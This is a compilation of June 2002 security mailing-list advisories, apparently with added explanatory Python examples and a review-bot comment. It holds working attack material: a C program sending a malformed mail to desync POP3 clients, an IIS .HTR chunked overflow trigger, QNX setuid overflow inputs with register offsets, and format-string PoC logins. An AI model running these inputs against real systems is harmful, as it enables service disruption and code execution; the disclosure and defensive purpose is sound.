ADVISORY: Windows 2000 and NT4 IIS .HTR Remote Buffer Overflow [AD20020612]

2002-06-12 Thread Ryan Permeh

Windows 2000 and NT4 IIS .HTR Remote Buffer Overflow

Release Date:
June 12, 2002

Severity:
High (Remote code execution)

Systems Affected:
Microsoft Windows NT 4.0 Internet Information Services 4.0
Microsoft Windows 2000 Internet Information Services 5.0

A vulnerability in transfer chunking, in combination with the processing of
HTR request sessions, can be exploited to remotely execute code of an
attacker's choice on the vulnerable machine. By sending a carefully crafted
session, an attacker can overwrite a section of the heap. Data structures in
the overwritten heap can be manipulated to move attacker-supplied data to
attacker-supplied memory addresses, thereby altering the flow of execution
into an attacker-supplied payload.

This is a very serious vulnerability and eEye suggests that administrators
install the Microsoft supplied patch as soon as possible.

The following example session triggers the vulnerable condition. The
dllhost.exe child process will die silently because the developers have
replaced the default exception filter, so if you want to examine this more
closely, attach a debugger to the dllhost child process before you send this
example session over the wire.

**Begin Session**
POST /EEYE.htr HTTP/1.1
Host: 0day.big5.com
Transfer-Encoding: chunked

20
EEYE2002
0
[enter]
[enter]
**End Session**

Technical Description:

The example session above overwrites a section of the heap that contains
data structures related to the memory management system. By manipulating the
content of these structures we can overwrite an arbitrary 4 bytes of memory
with an attacker supplied address.

While many may believe that the risk of these types of vulnerabilities is
fairly low, because addressing is dynamic and brute-force techniques would
need to be used in an attack, eEye strongly disagrees. This premise is false:
successful exploitation can be achieved in one attempt, across DLL versions.
An attacker can overwrite static global variables, stored function pointers,
process management structures, memory management structures, or any number
of other data types that will allow him to gain control of the target
application in a single session.

SecureIIS(tm) Application Firewall for Microsoft IIS

It should be noted that clients using any version of SecureIIS from eEye
Digital Security are secure from this vulnerability. This vulnerability was
discovered by the eEye team while testing a new version of SecureIIS to help
further its protection abilities from similar classes of attack. To learn
more visit http://www.eeye.com/SecureIIS

Vendor Status:
Microsoft has released a security bulletin and patch:
http://www.microsoft.com/technet/security/

Beyond installing the Microsoft security patch, it is also recommended to
disable the .htr ISAPI extension mapping if you have not already done so.
Microsoft's security bulletin references more information on the steps to
disable the .htr mapping.

Credit: Riley Hassell

Greetings: Caesar, K2, Dark Spyrit, Solar Designer, Joey, Halvar, Gera,
Scut, Ilfak Guilfanov. And last but not least, Kasia and Jenn ;) and as
always, www.securityfocus.com.

Copyright (c) 1998-2002 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail [EMAIL PROTECTED] for
permission.

Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.

Feedback
Please send suggestions, updates, and comments to:

eEye Digital Security
http://www.eEye.com
[EMAIL PROTECTED]
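As an added example (not eEye's code, and nothing here touches a network), the session from the advisory built as bytes in Python, beside a strict Transfer-Encoding: chunked decoder of the kind a reverse proxy or application firewall can run before forwarding a request to IIS. The point the session relies on is visible in the bytes: the chunk-size line says 0x20 (32) bytes, but only the 8 bytes of "EEYE2002" follow before the terminating 0-chunk. The host name, the function names and the decoder itself are assumptions for the example.

```python
"""Constructed example: the advisory's chunked .HTR session as bytes, plus a
strict Transfer-Encoding: chunked decoder that rejects size/data mismatches.
Not eEye's code; names and the decoder are assumptions for the example."""

CRLF = b"\r\n"


def build_htr_session(host: str, path: str = "/EEYE.htr",
                      declared_size: int = 0x20,
                      chunk: bytes = b"EEYE2002") -> bytes:
    """Return the advisory's session verbatim as a byte string.

    The chunk-size line says 0x20 (32) bytes but only 8 bytes ("EEYE2002")
    follow before the last-chunk line; that mismatch is the whole point.
    """
    head = (f"POST {path} HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            "Transfer-Encoding: chunked\r\n\r\n").encode()
    body = (b"%x" % declared_size) + CRLF + chunk + CRLF + b"0" + CRLF + CRLF + CRLF
    return head + body


def split_request(raw: bytes):
    """Split a raw HTTP request into (header block, body)."""
    head, _, body = raw.partition(CRLF + CRLF)
    return head, body


def decode_chunked(body: bytes) -> list:
    """Strictly decode a chunked body into a list of chunk payloads.

    Raises ValueError when a chunk-size line is malformed, when fewer bytes
    than declared are present, or when the chunk data is not followed by
    CRLF. A front end that decodes this way never forwards the mismatched
    session to the back end; it answers 400 instead.
    """
    chunks = []
    pos = 0
    while True:
        eol = body.find(CRLF, pos)
        if eol < 0:
            raise ValueError("truncated chunk-size line")
        size_field = body[pos:eol].split(b";", 1)[0].strip()   # drop chunk extensions
        try:
            size = int(size_field, 16)
        except ValueError:
            raise ValueError("bad chunk size %r" % size_field) from None
        pos = eol + 2
        if size == 0:
            return chunks                       # last-chunk; trailers not handled here
        data = body[pos:pos + size]
        if len(data) != size or body[pos + size:pos + size + 2] != CRLF:
            raise ValueError("declared %d bytes, found %d before CRLF"
                             % (size, len(data)))
        chunks.append(data)
        pos += size + 2
```

Run against the advisory's session, decode_chunked() raises on the first chunk (32 declared, 17 bytes left in the whole body); a well-formed body such as "8\r\nEEYE2002\r\n0\r\n\r\n" decodes to a single chunk. Chunk extensions after ";" are accepted and ignored, as RFC 2616 allows.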




Another small DoS on Mozilla <= 1.0 through pop3

2002-06-12 Thread eldre8


/ Strange Software Behaviour Report
///
 discovered, understood and exploited between 05, 08 2001
 (yes, I took the time... :) )
///  eldre8
Wed Jun 12 20:47:59 CEST 2002

\/\/\_/-> Systems affected:
Netscape <= 4.77
Mozilla < 1.1

^\/\/'\-> Systems not affected:
Outlook Express 4.72.3110.5
maybe the other versions of Outlook

|_/\/\\/> Buggy software team contacted about this:
Yes, the bug is fixed now.

/\/\/\_/> Exploitation: remote & very easy & very anonymous :(

_/\/\/\_> Effects: With this remote hole, we can block any mail
box that is checked with a POP3 client, so
Hotmail- or Yahoo-style (webmail) servers are not affected.
A mail will cause the POP3 client to desynchronize
from the server, losing the connection to it, and
so leaving all messages on the server (explained later)...

-/\/\/\/> Explanation: In the SMTP protocol, we send mail with
some introductory commands (ehlo, mail, rcpt), then
type our message and place a dot on a line of its own to
tell the MTA that it is the end of the message.
On the other side, when a POP3 client checks mail, it
connects to the server and retrieves the mail; it ends
the download of a message when it sees a dot on a line of its own.
And here is the trick.
If we can place a dot on a new line, and place other
words below this dot, the client will believe the mail
is finished and will try to download the next messages, thus
being desynchronized from the server...
The POP3 client acts as follows:
log on to the POP3 server
retrieve mails
delete mails
log out
but if it is desynchronized, it will retrieve mail and
disconnect, thus not deleting the mails, and the next time
it logs in it will find the same mail again, retrieve the mails one
more time, disconnect, and so on and so on...
A more detailed explanation;
here is a simple end of a normal mail:
blabla...
\x0a
\x0a
and this is the bad mail:
blabla...
\x0a\x0d\x2e\x0d\x20\x0a\x0a\x0a
blabla...
\x0a\x20\x00
\x0a
The two 0x0a we see at the end seem to be placed
there just by the console... forget them.
At this stage, you should be able to catch the bug...

=\/\/\/-> Possible fixes: There are different ways to fix this:
- one way, from the client side, is to stop the bad mail:
connect manually via telnet to the POP3
server, identify the bad message and do a
dele <# of the message>
- a better way is to fix the client itself:
the client can get the size of each message via
the list command, so it should be able to retrieve
the complete message, not less, not more...
- another way is to fix the MTA so it will not accept mail
such as the one produced by the code below...

~\/\/\/~> (buggy:])Exploit:

/* this is the code that comes with my
 * advisory #1 to illustrate this...
 * eldre8 at afturgurluk (double dot minus one) org
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define MX "localhost"
#define EHLO "EHLO mx\r\n"
#define MAIL "MAIL FROM: root@localhost\r\n"
#define RCPT "RCPT TO: root@localhost\r\n"
#define DATA "DATA\r\n"
#define QUIT "QUIT\r\n"

#define PORT 25

int sock;
char buffer[255];

void SigCatch(int sig) {
    (void)sig;
    fprintf(stderr, "\b\bbye!\n");
    close(sock);
    exit(0);
}

int main() {
    /* I was too lame to implement the command line... :) */
    int i;
    struct sockaddr_in sout;
    struct hostent *hp;

    signal(SIGINT, SigCatch);

    hp = gethostbyname(MX);
    if (hp == NULL) {
        perror("gethostbyname");
        return -1;
    }
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror("sock");
        return -1;
    }

    memset(&sout, 0, sizeof(sout));
    sout.sin_family = AF_INET;
    sout.sin_port = htons(PORT);
    memcpy(&(sout.sin_addr), *(hp->h_addr_list), sizeof(struct in_addr));
    if (connect(sock, (struct sockaddr *)&sout, sizeof(sout)) < 0) {
        perror("connect");
        return -1;
    }
    /* strlen() rather than sizeof(): the string's NUL must not go on the wire */
    recv(sock, buffer, 255, 0); /* receive the banner... */
    send(sock, EHLO, strlen(EHLO), 0);
    recv(sock, buffer, 255, 0); /* receive the welcome message... */
    send(sock, MAIL, strlen(MAIL), 0);
    recv(sock, buffer, 255, 0); /* receive the acknowledgement to mail from. */
    send(sock, RCPT, strlen(RCPT), 0);
    recv(sock, buffer, 255, 0); /* idem, but for the rcpt to... */
    send(sock, DATA, strlen(DATA), 0);
    recv(sock, buffer, 255, 0);
    /* the body: a line made of CR '.' CR SPACE (the fake terminator), more
     * text, an embedded NUL, and then the real end-of-data marker */
    i = sprintf(buffer, "b4d maIl 1n 4KT1oN!\n\x0a\x0d\x2e\x0d\x20\x0a\x0a\nblabla...\x0a\x20");
    *(buffer + i) = '\0';
    sprintf(buffer + i + 1, "\n.\n");
    send(sock, buffer, i + 1 + 3, 0); /* send the dumb thing ... */
    recv(sock, buffer, 255, 0);
    send(sock, QUIT, strlen(QUIT), 0);
    recv(sock, buffer, 255, 0);
    close(sock);
    return 0;
}
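As an added example, not eldre8's code nor any mail client's, the client-side rule the post's second fix amounts to, written out in Python: under RFC 1939 a RETR reply ends only at a line consisting of a single ".", any other line that begins with "." has been byte-stuffed by the server and loses that dot, and a line such as CR "." CR SPACE is ordinary message text. The loose reader below stops at the first line that looks like "." after stripping whitespace, which is how the post's bad mail leaves the rest of the message queued as the reply to the client's next command. The RETR reply and the follow-on reply are constructed for the example; the reader handles CRLF-terminated lines only, as the RFC requires.

```python
"""Constructed example: how a POP3 client must read a RETR reply so that a body
line such as CR '.' CR SPACE cannot end the transfer early (not the post's
code; the sample reply below is made up to mirror the post's bad mail)."""

CRLF = b"\r\n"

# Constructed RETR reply: the second body line is \r.\r<space>, which is NOT
# the terminator (that is a line holding only "."), and the server's reply to
# the client's next command is queued right behind it.
BAD_MAIL_RETR = (b"+OK 37 octets" + CRLF
                 + b"b4d maIl 1n 4KT1oN!" + CRLF
                 + b"\r.\r " + CRLF
                 + b"blabla..." + CRLF
                 + b"." + CRLF)
NEXT_REPLY = b"+OK 1 messages (37 octets)" + CRLF


def _after_status(stream: bytes) -> bytes:
    """Strip the +OK status line; a -ERR reply carries no multi-line body."""
    status, _, rest = stream.partition(CRLF)
    if not status.startswith(b"+OK"):
        raise ValueError("RETR failed: %r" % status)
    return rest


def read_retr_naive(stream: bytes):
    """Loose reader: split on LF and stop at the first line that is '.' once
    whitespace is stripped. Returns (body_lines, unconsumed_bytes)."""
    rest = _after_status(stream)
    body, pos = [], 0
    for raw in rest.split(b"\n"):
        pos += len(raw) + 1
        if raw.strip() == b".":          # "\r.\r " passes this test: early stop
            return body, rest[pos:]
        body.append(raw.rstrip(b"\r"))
    raise ValueError("no terminator")


def read_retr_strict(stream: bytes):
    """RFC 1939 reader: lines end in CRLF, the terminator is the exact line '.',
    and any other line starting with '.' has its byte-stuffing dot removed."""
    rest = _after_status(stream)
    body, pos = [], 0
    while True:
        eol = rest.find(CRLF, pos)
        if eol < 0:
            raise ValueError("reply truncated before terminator")
        line, pos = rest[pos:eol], eol + 2
        if line == b".":
            return body, rest[pos:]
        body.append(line[1:] if line.startswith(b".") else line)


def encode_retr(lines: list) -> bytes:
    """Server side of the same rule: byte-stuff lines that begin with '.' and
    append the terminator, so stored content round-trips unchanged."""
    out = b"+OK %d lines" % len(lines) + CRLF
    for line in lines:
        out += (b"." + line if line.startswith(b".") else line) + CRLF
    return out + b"." + CRLF
```

With the bad mail, the strict reader returns all three body lines and leaves exactly NEXT_REPLY unread; the naive one returns one line and leaves "blabla...\r\n.\r\n+OK ..." in the buffer, so the client's next command appears to be answered with garbage and it drops the connection without ever sending DELE, which is the loop the post describes. The post's suggestion of trusting LIST sizes would also work, but the terminator rule is what the protocol actually guarantees.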

Part II: Vulnerability in 3Com® OfficeConnect® Remote 812 ADSL Router

2002-06-12 Thread Ismael Briones

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


TITLE: A more detailed description of the 3Com® OfficeConnect® Remote 812 ADSL
Router vulnerability

DESCRIPTION: A detailed description of the vulnerability, its status and solutions.
I am sending this mail to explain the real problem and the solutions to all the
people who were interested in the bug.

Thanks to all the people who have sent me an email with their experiences.

PROBLEM SUMMARY:

In the previous mail, I warned about a problem in PAT (Port
Address Translation) that can be used to access all ports on the computer
behind the router. [EMAIL PROTECTED] informed me about a feature called iNAT
or iPAT (Intelligent NAT/PAT; I think this should be called Stupid NAT/PAT).
With this feature, when a connection is established from a computer
behind the router to a remote computer, the router redirects all the
connections from the remote computer to the computer behind the router that
initiated the connection, even if the ports aren't redirected with PAT.
Somebody from 3Com Europe sent me a mail with the same explanation,
and quoted a text extracted from the 812 CLI (Version 2.0) documentation (see
attachment). But iNAT/PAT really has a bug.

BUG:
When we try to connect to a port that is not redirected to a computer
behind the router using iPAT, there is no problem: the router doesn't allow
the connection. But if we first connect to a port that is redirected using iPAT
and immediately afterwards try to connect to any port that is not redirected
using iPAT, the router allows the successive connections to any port,
redirecting them to the internal computer. The problem exists with TCP and with
UDP. The problem exists when iPAT is enabled (it is enabled by default), and it
isn't a feature, it is a bug.
A lot of people sent me mails saying that this is a feature called iNAT, but
iNAT isn't working as it should.

SOLUTIONS:

Disable iNAT/PAT (caution: some programs, like NetMeeting, may not
work). There is an unofficial version of the firmware (version 2.1.2) at
http://www.adslnet.ws/ ( http://es.geocities.com/doelgroup/mr020102.zip )
that seems not to have the bug. If somebody tries it, please let me
know.


- -- 
- --
Ismael Briones Vilar                 Mundinteractivos - El Mundo
Area de Internet                     Pradillo, 42
[EMAIL PROTECTED]                    28002 - Madrid (SPAIN, EU)
http://www.elmundo.es/               Tel: (+34) 915864800 (Ext: 4615)
                                     Fax: (+34) 915864480
- --
GPG PubKey:
fingerprint: 8FD8 1450 29AC 5B5F 4186  0417 B67A 978F 281C D54F
http://pgp.rediris.es:11371/pks/lookup?op=get&search=0x281CD54F
- --

"This business is a living organism. It multiplies without end,
surrounded by predators. There is no room for idle time or hesitation.
New discoveries flood us, new ideas, ready to be devoured,
redefined. This business is binary. You are a one or a zero, you live or
you die."
Gary Winston (AntiTrust)

"Good artists copy, great artists steal."
  Pablo Picasso


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE9B4IatnqXjygc1U8RAu/QAKCfF8K299YHckLKa6MYVWHRORXFHwCfR+xy
/fm65CLKYVDrz04gR1hFO34=
=f5/8
-END PGP SIGNATURE-



madcr: QnX 4.25 - multiples bof in suid/no suid files

2002-06-12 Thread Egor Egorov



/bin/sample
//--
# cd /bin
# ls -l sample
-rwsrwxr-x  1 root  root  20639 Jan 19  1996 sample
# sample `perl -e 'print "A" x 280'`
Profile based upon 2000 samples/second.

//1/bin/sample terminated (SIGSEGV) at 0005:0041
%1  672  Memory fault  sample $(perl -e 'print "A" x 280')

# wd sample `perl -e 'print "A" x 280'`
ebp: 41414141
eip: 0041

# wd sample `perl -e 'print "A" x 280, "B"'`
ebp: 41414141
eip: 4241
//--


/bin/ex
//--
# wd ex `perl -e 'print "AAA" x 420, "good", "CCC" x 280'`
ebp: 0041
eip: 646f6f67 - doog
//--

file            bytes for bof

/bin/du   - 558
/bin/find - 799
/bin/lex  - 1673
/bin/mkdir- 517
/bin/rm   - 351
/bin/serserv  - 224
/bin/tcpserv  - 146
/bin/termdef  - 729
/bin/time - 2489
/bin/unzip- 299
/bin/use  - 1964
/bin/wcc  - 138
/bin/wcc386   - 137
/bin/wd   -
/bin/wdisasm  - 135
/bin/which- 304
/bin/wlib - 256
/bin/wlink- 10244
/bin/wpp  - 256
/bin/wpp386   - 256
/bin/wprof- 141
/bin/write- 157
/bin/wstrip   - 817
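The post finds the overwrite point by hand: a run of 280 "A"s puts 0x41 into eip, and appending one "B" turns it into 0x4241. As an added example (not madcr's or QNX's code), the same measurement done in one run with a cyclic pattern, generalised from that A/B probing: every 4-byte window of the pattern is unique, so the value a register holds after the crash maps straight back to a byte offset, and a second probe with a marker spliced at that offset confirms it. The function names are assumptions; `wd` on QNX 4 prints eip as 16 bits (as "eip: 4241" above), which is why the lookup takes a register width.

```python
"""Constructed example: find which bytes of a crashing argument land in a
register, generalising the "A" x N / "A" x N, "B" probing shown above.
Not the poster's code; names are assumptions for the example."""

import string


def cyclic_pattern(length: int) -> bytes:
    """Aa0Aa1...Aa9Ab0... pattern: every 3-byte group is unique, so any 4
    consecutive bytes identify one position (unique up to 20280 bytes)."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern longer than 20280 bytes is not unique")


def pattern_offset(pattern: bytes, reg_value: int, width: int = 4,
                   little_endian: bool = True):
    """Offset in `pattern` of the bytes a register holds after the crash.

    `width` is the register size in bytes: 4 for a 32-bit ebp such as
    41414141, 2 for the 16-bit eip that wd prints on QNX 4. Two-byte values
    are not guaranteed unique; the first occurrence is returned. None means
    the value did not come from the pattern (register never clobbered, or
    only partly overwritten).
    """
    needle = reg_value.to_bytes(width, "little" if little_endian else "big")
    idx = pattern.find(needle)
    return None if idx < 0 else idx


def marker_probe(length: int, offset: int, marker: bytes = b"BBBB") -> bytes:
    """Confirmation run, like the post's "A" x 280, "B": a filler of As with
    the marker spliced in at `offset`. Seeing 0x42424242 (or 0x4242 on a
    16-bit register display) proves the offset is right."""
    filler = b"A" * length
    return filler[:offset] + marker + filler[offset + len(marker):]
```

Usage: feed cyclic_pattern(n) to the target in place of the "A" run, read the faulting register from wd, and call pattern_offset() with that value; then re-run with marker_probe(n, offset) and check for the 0x42 bytes before building anything on the offset.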




[CERT-intexxia] mmftpd FTP Daemon Format String Vulnerability

2002-06-12 Thread Benoît Roussel

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


SECURITY ADVISORY                                         INTEXXIA(c)
04 06 2002                                           ID #1053-040602

TITLE   : mmftpd FTP Daemon Format String Vulnerability
CREDITS : Guillaume Pelat / INTEXXIA



SYSTEM AFFECTED
===

mmftpd <= 0.0.7





DESCRIPTION
===

"mmftpd is a  secure FTP server  that runs as a normal user, and
supports  virtual  users  only. Each user may have specific permissions,
including  the  maximum  home  directory  size limit and download/upload
speeds. It runs on both  BSD and Linux systems, and is ideal for a setup
with many  Web virtual host customers. It was written from scratch, with
no borrowed code."

The intexxia Laboratory found a remotely exploitable format string
vulnerability in the mmftpd FTP daemon.





DETAILS
===

There  is  a  format  string  vulnerability  in the 'mmsyslog()'
function  of the  'mmftpd ' program. This function acts like 'vsyslog()'
if '__GLIBC__' is  defined.  It calls  the 'syslog(3)' function  with  a
format string that can be defined by a remote user. It is not  necessary
to authenticate to exploit this vulnerability.

Successful exploitation of this flaw can allow a remote, unauthenticated
user to execute code with the privileges of the user mmftpd runs as, i.e.
to obtain a local account on the target machine.





PROOF OF CONCEPT
===

test:~$ telnet test.lab.intexxia.com 21
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 ftp.somehost.net FTP server (mmftpd (0.0.7/mmondor)) ready
USER %p%p 
331 Password required for this user
PASS foo
530 Invalid login

In the log file :
mmftpd[1875]: 3CFC80CF Failed login for 0x80598800x80ae73c (unexisting)

test:~$ telnet test.lab.intexxia.com 21
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 ftp.somehost.net FTP server (mmftpd (0.0.7/mmondor)) ready
USER %p%p%n
331 Password required for this user
PASS foo
Connection closed by foreign host.

test:~$ telnet test.lab.intexxia.com 21
Trying x.x.x.x...
telnet: Unable to connect to remote host: Connection refused





SOLUTION
===

The following patch corrects this issue :

diff -dru mmftpd-0.0.7/mmlib/mmlog.c mmftpd-0.0.7.fixed/mmlib/mmlog.c
- --- mmftpd-0.0.7/mmlib/mmlog.c Mon May 13 08:20:13 2002
+++ mmftpd-0.0.7.fixed/mmlib/mmlog.c Tue Jun  4 11:25:03 2002
@@ -70,7 +70,7 @@
  va_start(lst, fmt);
  vsnprintf(buf, 1023, fmt, lst);
  va_end(lst);
- - syslog(LOG_NOTICE, buf);
+ syslog(LOG_NOTICE, "%s", buf);
 }
 }
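Review bot: the change at `+ syslog(LOG_NOTICE, "%s", buf);` is the right fix, but the line just above it, `vsnprintf(buf, 1023, fmt, lst);`, shows that mmsyslog() still formats a caller-supplied `fmt`, so the function is only safe while every call site passes a literal format and never the remote-supplied string itself (the USER argument in this advisory); a comment on the function saying so, and a pass over each caller, would close that out. The hard-coded 1023 should also be tied to the buffer, `sizeof(buf)` if buf is a local array (vsnprintf NUL-terminates within the size it is given), so the limit cannot drift from the declaration.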

A new version including this patch is available at the following URL :
http://mmondor.gobot.ca/software/linux/mmftpd-0.0.8.tar.gz





VENDOR STATUS
=

04-06-2002 : This bulletin was sent to Matthew Mondor.
05-06-2002 : Matthew   was  very   reactive  and  confirmed  the
 vulnerability. He released a new version.





LEGALS
==

mmftpd is a registered trademark.


Intexxia provides this  information  as a public service and "as
is". Intexxia  will not be  held accountable for  any damage or distress
caused by the proper or improper usage of these materials.


(c) intexxia 2002. This  document is property  of intexxia. Feel
free to use and distribute  this material as long as  credit is given to
intexxia and the author.





CONTACT
===

CERT intexxia  [EMAIL PROTECTED]
INTEXXIA http://www.intexxia.com
171, av. Georges Clemenceau          Standard : +33 1 55 69 49 10
92024 Nanterre Cedex - France        Fax : +33 1 55 69 78 80

-BEGIN PGP SIGNATURE-
Version: PGPfreeware 7.0.3 for non-commercial use 

iQA/AwUBPQdFek2N8BNyNDXLEQKEpACgt/bLhZ6ahg8ryeQZySgsAwfgrN0AoN1t
+RZxkiJQjPqx2M/035bKlMSq
=pRJF
-END PGP SIGNATURE-





Oracle TNS Listener Buffer Overflow (#NISR12062002A)

2002-06-12 Thread NGSSoftware Insight Security Research

NGSSoftware Insight Security Research Advisory

Name: Oracle TNS Listener Buffer Overflow
Systems: Windows and VM running all versions of Oracle 9i Database
Severity: High Risk
Category: Remote Buffer Overrun Vulnerability
Vendor URL: http://www.oracle.com/
Author: David Litchfield ([EMAIL PROTECTED])
Advisory URL: http://www.ngssoftware.com/advisories/oratns.txt
Date: 12th June 2002
Advisory number: #NISR12062002A
(VNA reference : http://www.nextgenss.com/vna/ora-lsnr.txt )

Description
***
The Oracle Net Listener contains a remotely exploitable buffer overrun
vulnerability that can allow an attacker to gain complete control of a
machine running the Oracle 9i Database.

Details
***
The Listener 'listens' on TCP port 1521 for client requests to use the
database. On receiving a request, the client is passed off to an instance of
the database. The request, packaged in a valid TNS packet, is of the form

(DESCRIPTION=(ADDRESS=
(PROTOCOL=TCP)(HOST=x.x.x.x)
(PORT=1521))(CONNECT_DATA=
(SERVICE_NAME=myorcl.ngssoftware.com)
(CID=
(PROGRAM=X:\\ORACLE\\iSuites\\BIN\\SQLPLUSW.EXE)
(HOST=foo)(USER=bar

By supplying an overly long SERVICE_NAME parameter, a saved return address on
the stack is overwritten while the error message to be written to the log
file is being formed, thus gaining control over the process's execution. Any
code supplied by the attacker will run, by default, in the context of the
Local SYSTEM account on Windows platforms, and as such this is a high-risk
vulnerability. Because the overflow occurs before the error message is
actually written to the log file, it may be difficult to detect whether an
attack has occurred. Customers are advised to patch this as soon as possible.


Fix Information
***
NGSSoftware alerted Oracle to this problem on the 13th of May and Oracle
have now released patches which are available from the Metalink site. The
patch number is 2367681.

A check for this vulnerability has been added to Typhon II, NGSSoftware's
vulnerability assessment scanner, of which, more information is available
from the NGSSite, http://www.ngssoftware.com/
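The connect data above is Oracle's nested (KEY=VALUE) keyword syntax. As an added example (not NGSSoftware's or Oracle's code), a small parser for that syntax with a length check over every leaf value, of the kind a listener-side filter or a network sensor on port 1521 could apply before the Listener sees the request: the descriptor is parsed into nested dicts, repeated keys (several ADDRESS entries) become lists, unbalanced or truncated input is rejected, and any field longer than a limit is reported by its dotted path. The 64-character limit and the sample request are assumptions for the example, not values from the advisory.

```python
"""Constructed example: a parser for Oracle's (KEY=VALUE) connect-descriptor
syntax with a length check on leaf values. Not Oracle's or NGSSoftware's
code; the sample request and the 64-char limit are assumptions."""


def _skip_ws(text, pos):
    while pos < len(text) and text[pos].isspace():
        pos += 1
    return pos


def _parse_node(text, pos):
    """Parse one '(KEY=...)' starting at text[pos]; return (key, value, next_pos)."""
    if pos >= len(text) or text[pos] != "(":
        raise ValueError("expected '(' at offset %d" % pos)
    eq = text.find("=", pos)
    if eq < 0:
        raise ValueError("keyword without '=' at offset %d" % pos)
    key = text[pos + 1:eq].strip()
    pos = _skip_ws(text, eq + 1)
    if pos < len(text) and text[pos] == "(":
        value = {}                       # nested keyword list
        while pos < len(text) and text[pos] == "(":
            k, v, pos = _parse_node(text, pos)
            if k in value:               # repeated keys (several ADDRESS=) become a list
                if not isinstance(value[k], list):
                    value[k] = [value[k]]
                value[k].append(v)
            else:
                value[k] = v
            pos = _skip_ws(text, pos)
    else:
        close = text.find(")", pos)
        if close < 0:
            raise ValueError("unterminated value for %s" % key)
        value = text[pos:close].strip()  # plain string value
        pos = close
    if pos >= len(text) or text[pos] != ")":
        raise ValueError("missing ')' closing %s" % key)
    return key, value, pos + 1


def parse_descriptor(text: str) -> dict:
    """Parse a whole descriptor; reject trailing data and unbalanced parens."""
    key, value, pos = _parse_node(text, _skip_ws(text, 0))
    if _skip_ws(text, pos) != len(text):
        raise ValueError("trailing data after descriptor")
    return {key: value}


def oversized_values(tree, limit: int, path: str = "") -> list:
    """[(dotted.path, length)] for every leaf string longer than `limit`."""
    found = []
    if isinstance(tree, dict):
        for k, v in tree.items():
            found += oversized_values(v, limit, path + "." + k if path else k)
    elif isinstance(tree, list):
        for i, v in enumerate(tree):
            found += oversized_values(v, limit, "%s[%d]" % (path, i))
    elif len(tree) > limit:
        found.append((path, len(tree)))
    return found


def check_connect(text: str, limit: int = 64) -> list:
    """Parse, then flag; `limit` is an assumed sane bound for any one field."""
    return oversized_values(parse_descriptor(text), limit)


# Constructed connect request of the form the advisory shows.
SAMPLE = ("(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=10.0.0.5)(PORT=1521))"
          "(CONNECT_DATA=(SERVICE_NAME=myorcl.ngssoftware.com)"
          "(CID=(PROGRAM=sqlplus)(HOST=foo)(USER=bar))))")
```

check_connect(SAMPLE) returns an empty list; with SERVICE_NAME replaced by 2000 bytes it returns [("DESCRIPTION.CONNECT_DATA.SERVICE_NAME", 2000)], which is the condition to drop before it reaches the Listener's logging path, since the advisory notes the overflow happens before anything is written to the log.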









Oracle Reports Server Buffer Overflow (#NISR12062002B)

2002-06-12 Thread NGSSoftware Insight Security Research

NGSSoftware Insight Security Research Advisory

Name: Oracle 9iAS Reports Server
Systems: All
Severity: High Risk
Category: Remote Buffer Overrun Vulnerability
Vendor URL: http://www.oracle.com/
Author: David Litchfield ([EMAIL PROTECTED])
Advisory URL: http://www.ngssoftware.com/advisories/orarep.txt
Date: 12th June 2002
Advisory number: #NISR12062002B
(VNA Reference: http://www.nextgenss.com/vna/ora-reports.txt )

Description
***
Oracle's Report Server contains a remotely exploitable buffer overrun
vulnerability in one of its CGI based programs.

Details
***
By supplying an overly long database name parameter to rwcgi60 with the
setauth method, a remote attacker can overwrite a saved return address on
the stack, gaining control over the process's execution.

Any exploit code supplied by the attacker will run in the security context
of the account the web server is running as. On platforms running a Unix
variant this account normally has limited privileges; on Windows-based
systems, however, the web server by default runs in the context of the local
SYSTEM account.

Fix Information
***
NGSSoftware alerted Oracle to this problem on December the 17th 2001 and
Oracle have now released patches which are available from the Metalink site.
The patch number is 2356680.







[CERT-intexxia] mmmail POP3-SMTP Daemon Format String Vulnerability

2002-06-12 Thread Benoît Roussel

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


SECURITY ADVISORY                                         INTEXXIA(c)
04 06 2002                                           ID #1054-040602

TITLE   : mmmail POP3-SMTP Daemon Format String Vulnerability
CREDITS : Guillaume Pelat / INTEXXIA



SYSTEM AFFECTED
===

mmmail <= 0.0.13 (mmpop3d & mmsmtpd)





DESCRIPTION
===

"mmmail provides  SMTP and  POP3 daemons using MySQL, running as
a  non-root  user.  It  also supports bandwidth shaping. Relaying is not
supported, although  it has  been designed  to handle many users on many
virtual hosts. It is fast and secure, uses threads, and has been written
entirely from scratch and does not rely on mbox or Maildir formats."

mmmail  includes  2  daemons,  mmpop3d  and  mmsmtpd.  Both  are
vulnerable to a remotely exploitable format string issue.





DETAILS
===

There  is  a  format  string  vulnerability  in the 'mmsyslog()'
function of  the 'mmpop3d'  and 'mmsmtpd'  programs. This  function acts
like 'vsyslog()' if '__GLIBC__' is  defined.  It  calls  the 'syslog(3)'
function with  a format  string that can be defined by a remote user. It
is not necessary to authenticate to exploit this vulnerability.

Successful exploitation of this flaw can allow a remote, unauthenticated
user to execute code with the privileges of the user the daemon runs as,
i.e. to obtain a local account on the target machine.





PROOF OF CONCEPT
===

mmpop3d
- ---

test:~$ telnet test.lab.intexxia.com 110
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
